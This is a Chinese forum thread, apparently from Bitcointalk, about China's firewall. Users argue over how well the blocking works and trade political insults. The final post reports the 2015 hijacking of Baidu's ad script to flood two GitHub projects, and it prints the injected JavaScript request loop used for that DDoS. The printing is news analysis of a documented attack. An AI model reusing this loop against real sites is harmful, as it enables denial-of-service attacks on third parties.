Author

Topic: 中国的国家防火墙调用民间流量攻击境外网站 (Read 1469 times)

full member
Activity: 206
Merit: 100
封锁有用吗,看看柏林墙就知道了。傻逼们只是在重复走失败者的历史老路
猪一样的智慧者有了GFW对他们更合适,圈养嘛
有用的,不过只是拖缓变革的发生,但是总有一天所有都会觉悟。但是中国的情况跟当你的德国不大一样,中共这套体制让中央主席到一个镇的镇长都受益,从而让这些人会极力维护这个体制的存在,所以中国要发生变革的条件可能要比当年的德国高很多。

没错,很有用的,他们很坏,但不要认为他们很笨。
hero member
Activity: 630
Merit: 500
封锁有用吗,看看柏林墙就知道了。傻逼们只是在重复走失败者的历史老路
猪一样的智慧者有了GFW对他们更合适,圈养嘛
有用的,不过只是拖缓变革的发生,但是总有一天所有都会觉悟。但是中国的情况跟当你的德国不大一样,中共这套体制让中央主席到一个镇的镇长都受益,从而让这些人会极力维护这个体制的存在,所以中国要发生变革的条件可能要比当年的德国高很多。
hero member
Activity: 770
Merit: 500
封锁有用吗,看看柏林墙就知道了。傻逼们只是在重复走失败者的历史老路
猪一样的智慧者有了GFW对他们更合适,圈养嘛
sr. member
Activity: 420
Merit: 250
挺无语的
GFW正在努力寻求存在感...

想知道一些事情的人,总是能翻墙的
不关心的人也不必翻

不要这样说,就是instagram被封锁之前玩的人很多,那次被封了,虽然大家都基本懂得翻墙,但是不用半年就基本很少人上的,这不是关系到会不会翻墙的问题,而且成本,麻烦,一定程度上是有效果的。

说的对。显然长期看来,封锁是有效果的。就好像国内社交网络都很少用FACEBOOK一样,使用什么社交平台是有外部效应的。
sr. member
Activity: 476
Merit: 250
G.F.W等相关技术领先世界几百年。
hero member
Activity: 658
Merit: 500
挺无语的
GFW正在努力寻求存在感...

想知道一些事情的人,总是能翻墙的
不关心的人也不必翻

不要这样说,就是instagram被封锁之前玩的人很多,那次被封了,虽然大家都基本懂得翻墙,但是不用半年就基本很少人上的,这不是关系到会不会翻墙的问题,而且成本,麻烦,一定程度上是有效果的。
newbie
Activity: 12
Merit: 0
挺无语的
GFW正在努力寻求存在感...

想知道一些事情的人,总是能翻墙的
不关心的人也不必翻
hero member
Activity: 770
Merit: 500
中国的国家防火墙调用民间流量攻击境外网站
请看博讯热点:网络封锁和压制
(博讯北京时间2015年3月27日 首发 - 支持此文作者/记者)
    26日9时(Pacific Daylight Time,北京时间27日12时)左右开始,从境外访问v.baidu.com的时候发现会出现Javascript alert出现的弹窗:
   
     WARNING: malicious javascript detected on this domain


   
    追查了一下发现是百度广告管家的js http://cbjs.baidu.com/js/m.js?_=1427431567741
    在境外访问时被替换成一段特殊的js。详细请求和返回的js见:http://pastie.org/10056531
   
    反编译后代码大致如下:
    "document.write("     src='\x3c/script>">http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");!window.jQuery&&document.write("     src='\x3c/script>">http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime=(new
    Date).getTime();var count=0;function unixtime(){var a=new Date;return
    Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["https://github.com/greatfire/","https://github.com/cn-nytimes/"];NUM=url_array.length;function
    r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
    b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
    Date).getTime()},complete:function(){responseTime=(new
    Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
    r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3);"
   
    很明显看出两个攻击目标: https://github.com/greatfire/https://github.com/cn-nytimes/
   
    大致的流程就是:
   
    1. GFW把某些常见网站的JS替换成以上js
   
    2. 全球各地访问国内网站时,相当于成为DoS的源(可能还有全国各地访问国外时,未经确认)
   
    3. GitHub不堪重负,把 https://github.com/greatfire/
    https://github.com/cn-nytimes/ 的返回改成一个alert: WARNING: malicious
    javascript detected on this domain (网站存在恶意JS代码调用)
   
    当境外用户访问内置境内一些网站如百度的JS调用的网站时,中国的国家防火墙GFW将这部分调用替换成重定向至目标网站,以调用民用流量的方式,实现对目标网站的DDOS攻击。中国网络审查监测机构Greatfire和纽约时报中文网目前尚未就此作出回应。 [博讯首发,转载请注明出处]- 支持此文作者/记者(博讯 boxun.com)
4941430
Jump to: